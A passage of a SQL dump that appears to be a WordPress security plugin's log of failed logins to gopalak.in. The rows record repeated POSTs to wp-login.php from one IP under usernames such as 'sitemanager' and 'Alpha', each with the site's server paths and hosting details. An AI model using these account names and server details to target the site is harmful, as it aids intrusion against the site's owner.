LE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059127.343225;s:12:\"REQUEST_TIME\";i:1747059127;}}','13.127.208.15',1,'2025-05-12 19:42:09','2025-05-13 20:21:05'),(95714,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059127.3422959;s:12:\"REQUEST_TIME\";i:1747059127;}}','13.127.208.15',1,'2025-05-12 19:42:09','2025-05-13 20:21:04'),(95715,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059127.3416059;s:12:\"REQUEST_TIME\";i:1747059127;}}','13.127.208.15',1,'2025-05-12 19:42:09','2025-05-13 20:21:04'),(95716,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059508.8947761;s:12:\"REQUEST_TIME\";i:1747059508;}}','13.127.208.15',1,'2025-05-12 19:48:30','2025-05-13 20:21:04'),(95717,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059508.895313;s:12:\"REQUEST_TIME\";i:1747059508;}}','13.127.208.15',1,'2025-05-12 19:48:30','2025-05-13 20:21:04'),(95718,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059508.8972869;s:12:\"REQUEST_TIME\";i:1747059508;}}','13.127.208.15',1,'2025-05-12 19:48:30','2025-05-13 20:21:04'),(95719,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059510.567982;s:12:\"REQUEST_TIME\";i:1747059510;}}','13.127.208.15',1,'2025-05-12 19:48:32','2025-05-13 20:21:05'),(95720,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059510.56865;s:12:\"REQUEST_TIME\";i:1747059510;}}','13.127.208.15',1,'2025-05-12 19:48:32','2025-05-13 20:21:05'),(95721,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059893.6201551;s:12:\"REQUEST_TIME\";i:1747059893;}}','13.127.208.15',1,'2025-05-12 19:54:56','2025-05-13 20:21:04'),(95722,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059893.617846;s:12:\"REQUEST_TIME\";i:1747059893;}}','13.127.208.15',1,'2025-05-12 19:54:56','2025-05-13 20:21:05'),(95723,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747059893.618397;s:12:\"REQUEST_TIME\";i:1747059893;}}','13.127.208.15',1,'2025-05-12 19:54:56','2025-05-13 20:21:04'),(95724,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:38:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:21:\"HTTP_X_FORWARDED_PORT\";s:3:\"443\";s:22:\"HTTP_X_FORWARDED_PROTO\";s:5:\"https\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"13.127.208.15\";s:14:\"HTTP_X_REAL_IP\";s:13:\"13.127.208.15\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:9:\"127.0.0.1\";s:11:\"REMOTE_PORT\";s:0:\"\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.208.15\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/t